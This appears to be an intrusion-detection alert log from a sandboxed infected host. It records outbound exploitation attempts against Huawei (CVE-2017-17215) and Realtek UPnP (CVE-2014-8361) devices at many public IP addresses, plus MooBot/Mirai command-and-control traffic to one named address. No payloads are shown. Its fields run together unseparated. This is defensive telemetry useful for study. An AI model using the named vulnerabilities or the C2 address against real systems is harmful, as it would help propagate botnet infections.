                                      2024-07-20T23:00:59.211994+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5052437215192.168.2.23197.26.114.175
                                      2024-07-20T23:01:18.307062+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4860837215192.168.2.23175.193.29.172
                                      2024-07-20T23:01:21.668534+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5058252869192.168.2.23212.172.247.72
                                      2024-07-20T23:00:59.186953+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5893237215192.168.2.23157.211.77.112
                                      2024-07-20T23:01:02.068477+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5563237215192.168.2.23157.78.46.190
                                      2024-07-20T23:01:09.027075+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4363252869192.168.2.23188.92.250.125
                                      2024-07-20T23:01:22.245977+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4498052869192.168.2.23103.179.244.2
                                      2024-07-20T23:01:18.612017+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3677237215192.168.2.23182.102.31.222
                                      2024-07-20T23:01:02.088869+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5499237215192.168.2.2341.134.147.250
                                      2024-07-20T23:01:19.455768+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4125252869192.168.2.23188.92.250.125
                                      2024-07-20T23:01:21.527399+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5204252869192.168.2.2375.16.13.92
                                      2024-07-20T23:00:59.164966+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5958237215192.168.2.2341.138.150.155
                                      2024-07-20T23:01:18.495841+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5154837215192.168.2.23172.101.164.72
                                      2024-07-20T23:01:18.312878+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4312637215192.168.2.23197.4.26.126
                                      2024-07-20T23:01:19.566537+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4103452869192.168.2.23193.14.204.18
                                      2024-07-20T23:01:19.636409+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5497052869192.168.2.23176.229.44.248
                                      2024-07-20T23:01:19.307325+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3829652869192.168.2.23199.214.91.137
                                      2024-07-20T23:01:20.810328+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5044252869192.168.2.234.194.116.48
                                      2024-07-20T23:01:18.397151+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4352037215192.168.2.2361.117.29.155
                                      2024-07-20T23:00:59.231512+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5833037215192.168.2.2341.128.110.44
                                      2024-07-20T23:01:21.267821+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5500252869192.168.2.23144.0.5.154
                                      2024-07-20T23:00:59.219743+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5991637215192.168.2.23157.129.228.162
                                      2024-07-20T23:00:59.175742+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3279837215192.168.2.23157.71.150.37
                                      2024-07-20T23:00:59.223718+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3966837215192.168.2.23157.53.103.29
                                      2024-07-20T23:01:00.654988+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4000237215192.168.2.23157.59.116.210
                                      2024-07-20T23:01:05.120492+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5695252869192.168.2.235.53.123.92
                                      2024-07-20T23:01:20.243707+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5656652869192.168.2.23113.34.69.120
                                      2024-07-20T23:01:00.658630+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4711837215192.168.2.23197.217.22.246
                                      2024-07-20T23:00:59.219743+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4001037215192.168.2.23170.47.187.157
                                      2024-07-20T23:01:19.419347+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3371252869192.168.2.23184.60.97.199
                                      2024-07-20T23:01:21.557356+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5848452869192.168.2.23186.129.229.179
                                      2024-07-20T23:00:56.851055+0200TCP2030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)328482466192.168.2.2315.235.203.214
                                      2024-07-20T23:01:00.651026+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5942837215192.168.2.23197.118.130.41
                                      2024-07-20T23:01:21.244103+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4823252869192.168.2.2398.176.193.82
                                      2024-07-20T23:00:59.218458+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4983637215192.168.2.23197.55.44.167
                                      2024-07-20T23:01:11.815818+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6047437215192.168.2.2341.171.182.143
                                      2024-07-20T23:01:20.280424+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4796452869192.168.2.2371.113.201.241
                                      2024-07-20T23:01:18.378526+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3800037215192.168.2.2341.143.61.103
                                      2024-07-20T23:00:59.170219+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3905437215192.168.2.2341.184.89.253
                                      2024-07-20T23:01:02.083467+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3383837215192.168.2.2341.101.142.15
                                      2024-07-20T23:00:59.203029+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5658637215192.168.2.2341.244.190.175
                                      2024-07-20T23:01:21.214465+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3606637215192.168.2.2358.150.96.208
                                      2024-07-20T23:01:21.527399+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5072452869192.168.2.23184.77.18.239
                                      2024-07-20T23:01:02.088423+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5870037215192.168.2.23157.224.12.67
                                      2024-07-20T23:01:19.580320+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5263452869192.168.2.23212.114.230.189
                                      2024-07-20T23:01:14.014458+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5765637215192.168.2.2341.176.109.210
                                      2024-07-20T23:01:00.663232+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5153437215192.168.2.23157.187.188.100
                                      2024-07-20T23:01:18.309512+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5912437215192.168.2.23157.236.245.35
                                      2024-07-20T23:01:19.326551+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5708852869192.168.2.235.1.90.206
                                      2024-07-20T23:01:19.496545+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4960252869192.168.2.23114.57.93.253
                                      2024-07-20T23:01:21.177250+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5854852869192.168.2.2337.189.124.248
                                      2024-07-20T23:01:21.723120+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3502452869192.168.2.23155.161.137.123
                                      2024-07-20T23:01:20.253167+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4674652869192.168.2.23113.241.155.67
                                      2024-07-20T23:01:00.660317+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3543837215192.168.2.23197.233.33.61
                                      2024-07-20T23:01:00.660317+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3286837215192.168.2.23113.30.251.105
                                      2024-07-20T23:01:21.019040+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6078452869192.168.2.23178.251.54.152
                                      2024-07-20T23:00:59.208769+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6090837215192.168.2.2341.96.218.16
                                      2024-07-20T23:00:59.219743+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4599637215192.168.2.23157.115.232.41
                                      2024-07-20T23:01:00.649623+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3293637215192.168.2.23137.33.55.254
                                      2024-07-20T23:01:20.314319+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5241452869192.168.2.2345.158.122.120
                                      2024-07-20T23:01:21.231239+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4831052869192.168.2.2312.208.124.228
                                      2024-07-20T23:00:59.203030+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3966237215192.168.2.23216.40.91.1
                                      2024-07-20T23:01:08.939279+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3389052869192.168.2.23133.66.91.121
                                      2024-07-20T23:01:11.815593+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3321037215192.168.2.23111.178.38.86
                                      2024-07-20T23:01:22.245977+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4692852869192.168.2.2358.116.31.11
                                      2024-07-20T23:01:18.275355+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5290637215192.168.2.23157.119.223.145
                                      2024-07-20T23:01:19.811938+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3704452869192.168.2.23117.27.97.229
                                      2024-07-20T23:01:19.339510+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5874852869192.168.2.23189.63.115.173
                                      2024-07-20T23:01:00.656262+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5986237215192.168.2.23197.92.38.185
                                      2024-07-20T23:01:18.285263+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5272837215192.168.2.23125.230.182.28
                                      2024-07-20T23:01:02.088423+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4658237215192.168.2.23157.238.18.41
                                      2024-07-20T23:01:21.554632+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4010437215192.168.2.23157.63.197.170
                                      2024-07-20T23:01:20.182814+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4928252869192.168.2.2370.239.61.12
                                      2024-07-20T23:01:00.648916+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3871437215192.168.2.2341.99.7.194
                                      2024-07-20T23:01:21.198290+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4952852869192.168.2.2346.176.142.26
                                      2024-07-20T23:01:18.539093+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4133037215192.168.2.23197.148.93.189
                                      2024-07-20T23:01:21.562923+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4515652869192.168.2.23120.98.109.98
                                      2024-07-20T23:01:19.858243+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5522452869192.168.2.23162.63.105.168
                                      2024-07-20T23:00:59.171003+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4141637215192.168.2.23197.194.145.174
                                      2024-07-20T23:01:00.661486+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5214637215192.168.2.2351.142.141.117
                                      2024-07-20T23:01:18.510150+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5590637215192.168.2.23197.159.88.79
                                      2024-07-20T23:00:59.201622+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3403237215192.168.2.23197.67.179.143
                                      2024-07-20T23:01:04.432754+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3392037215192.168.2.23187.182.184.30
                                      2024-07-20T23:01:18.599875+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4733237215192.168.2.23197.146.199.163
                                      2024-07-20T23:01:19.515380+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5727052869192.168.2.2341.215.81.142
                                      2024-07-20T23:01:21.588308+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5936052869192.168.2.23117.76.49.30
                                      2024-07-20T23:01:21.941341+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3842437215192.168.2.2341.90.83.142
                                      2024-07-20T23:00:59.208769+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4410637215192.168.2.23197.114.117.243
                                      2024-07-20T23:01:19.565849+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5238452869192.168.2.2390.243.193.156
                                      2024-07-20T23:01:21.840696+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5401252869192.168.2.23218.185.172.90
                                      2024-07-20T23:01:19.419599+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4714252869192.168.2.23213.46.179.130
                                      2024-07-20T23:01:18.285263+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4918837215192.168.2.23197.166.141.245
                                      2024-07-20T23:01:20.943979+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4174652869192.168.2.23115.161.142.144
                                      2024-07-20T23:01:21.531036+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4065052869192.168.2.2324.106.184.126
                                      2024-07-20T23:01:21.300446+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5140052869192.168.2.239.134.98.50
                                      2024-07-20T23:01:18.488326+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4417437215192.168.2.23197.38.235.14
                                      2024-07-20T23:00:59.175742+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5748837215192.168.2.23157.234.59.179
                                      2024-07-20T23:01:19.317572+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5263852869192.168.2.23164.189.55.135
                                      2024-07-20T23:01:20.184321+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5965237215192.168.2.23157.143.93.40
                                      2024-07-20T23:00:59.208769+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3462637215192.168.2.2341.160.207.169
                                      2024-07-20T23:01:21.514691+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5956437215192.168.2.23157.198.81.69
                                      2024-07-20T23:00:59.213565+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3475437215192.168.2.2341.24.39.230
                                      2024-07-20T23:01:02.136941+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3551237215192.168.2.2385.79.139.138
                                      2024-07-20T23:01:01.081889+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4346652869192.168.2.23189.75.86.189
                                      2024-07-20T23:01:00.648916+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4868037215192.168.2.231.70.219.104
                                      2024-07-20T23:01:18.167729+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4078837215192.168.2.23157.147.238.186
                                      2024-07-20T23:01:14.169782+0200TCP2030489ET MALWARE ELF/MooBot Mirai DDoS Variant Server Response24663284815.235.203.214192.168.2.23
                                      2024-07-20T23:01:00.663232+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3994037215192.168.2.23197.175.112.209
                                      2024-07-20T23:00:59.227759+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6046437215192.168.2.2341.189.194.244
                                      2024-07-20T23:01:19.466954+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5226852869192.168.2.23207.223.182.162
                                      2024-07-20T23:01:20.252557+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4088252869192.168.2.2391.33.144.77
                                      2024-07-20T23:01:19.827683+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4197452869192.168.2.23159.20.45.153
                                      2024-07-20T23:01:18.423367+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5770837215192.168.2.2341.143.175.164
                                      2024-07-20T23:01:20.197536+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5618837215192.168.2.23114.205.87.78
                                      2024-07-20T23:00:59.176163+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5894437215192.168.2.2341.20.92.100
                                      2024-07-20T23:01:00.648916+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5695637215192.168.2.2389.73.227.199
                                      2024-07-20T23:01:02.136941+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4261237215192.168.2.23178.236.15.67
                                      2024-07-20T23:01:21.202996+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3442452869192.168.2.23208.190.62.115
                                      2024-07-20T23:00:59.170219+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4635437215192.168.2.2384.167.140.65
                                      2024-07-20T23:01:20.137445+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3874237215192.168.2.23157.202.161.192
                                      2024-07-20T23:01:21.004535+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4781852869192.168.2.23120.187.5.172
                                      2024-07-20T23:01:18.422394+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4772837215192.168.2.2341.6.98.70
                                      2024-07-20T23:01:19.825974+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5737052869192.168.2.2370.59.242.166
                                      2024-07-20T23:00:59.227759+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5494837215192.168.2.23157.23.56.129
                                      2024-07-20T23:01:02.088869+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4665637215192.168.2.23157.47.11.186
                                      2024-07-20T23:01:18.545693+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3471837215192.168.2.23197.89.108.63
                                      2024-07-20T23:01:20.227541+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5777652869192.168.2.23189.28.183.134
                                      2024-07-20T23:01:11.816293+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5026437215192.168.2.2341.248.82.51
                                      2024-07-20T23:01:21.456312+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5966637215192.168.2.23197.28.251.253
                                      2024-07-20T23:01:21.267821+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5247852869192.168.2.23132.33.116.164
                                      2024-07-20T23:01:08.919725+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4675852869192.168.2.2312.55.180.198
                                      2024-07-20T23:00:59.224296+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5281237215192.168.2.2341.248.83.42
                                      2024-07-20T23:01:21.124881+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5011852869192.168.2.2374.116.148.181
                                      2024-07-20T23:01:00.661808+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3731037215192.168.2.23157.115.23.92
                                      2024-07-20T23:01:18.297902+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4265037215192.168.2.2347.7.162.229
                                      2024-07-20T23:01:14.013612+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3505237215192.168.2.2341.84.101.199
                                      2024-07-20T23:01:00.652845+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3597237215192.168.2.23209.253.85.199
                                      2024-07-20T23:01:20.191460+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3579852869192.168.2.23207.30.132.8
                                      2024-07-20T23:01:02.095698+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4730437215192.168.2.23111.12.203.144
                                      2024-07-20T23:01:21.844542+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5694052869192.168.2.23170.225.184.185
                                      2024-07-20T23:01:00.662826+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4554637215192.168.2.23157.12.106.29
                                      2024-07-20T23:00:59.170218+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5250037215192.168.2.23197.58.83.134
                                      2024-07-20T23:01:20.265368+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5954252869192.168.2.2375.207.187.133
                                      2024-07-20T23:01:21.267123+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6091252869192.168.2.23114.190.123.93
                                      2024-07-20T23:01:18.266144+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4028237215192.168.2.2323.141.91.228
                                      2024-07-20T23:01:21.454208+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3578452869192.168.2.23103.18.195.93
                                      2024-07-20T23:01:00.661808+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5485437215192.168.2.23157.21.145.183
                                      2024-07-20T23:01:00.648916+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5937037215192.168.2.23190.161.188.69
                                      2024-07-20T23:01:18.526699+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5895037215192.168.2.23197.71.207.159
                                      2024-07-20T23:01:21.181268+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6032652869192.168.2.232.32.130.76
                                      2024-07-20T23:00:59.184421+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3894637215192.168.2.2367.15.208.48
                                      2024-07-20T23:00:59.203030+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4197037215192.168.2.23197.113.51.118
                                      2024-07-20T23:01:21.188822+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3435837215192.168.2.23197.67.20.2
                                      2024-07-20T23:01:22.224479+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3941652869192.168.2.234.114.3.131
                                      2024-07-20T23:00:59.175742+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4150637215192.168.2.23157.139.2.14
                                      2024-07-20T23:01:02.136941+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4498437215192.168.2.23197.81.4.61
                                      2024-07-20T23:01:00.663232+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5773637215192.168.2.2341.242.166.123
                                      2024-07-20T23:01:20.359095+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3720252869192.168.2.2318.37.139.58
                                      2024-07-20T23:00:59.223718+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4954437215192.168.2.2341.37.144.8
                                      2024-07-20T23:01:00.648489+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3568037215192.168.2.23197.132.243.55
                                      2024-07-20T23:01:21.085513+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3821637215192.168.2.23197.235.150.198
                                      2024-07-20T23:01:21.160094+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4972252869192.168.2.23132.182.11.252
                                      2024-07-20T23:01:21.214465+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3833452869192.168.2.23207.112.16.238
                                      2024-07-20T23:01:00.652845+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6045237215192.168.2.2325.19.64.41
                                      2024-07-20T23:00:59.164966+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5578437215192.168.2.23197.64.180.236
                                      2024-07-20T23:01:18.271403+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4511237215192.168.2.23157.87.181.134
                                      2024-07-20T23:01:21.198929+0200TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6040252869192.168.2.2314.23.231.227
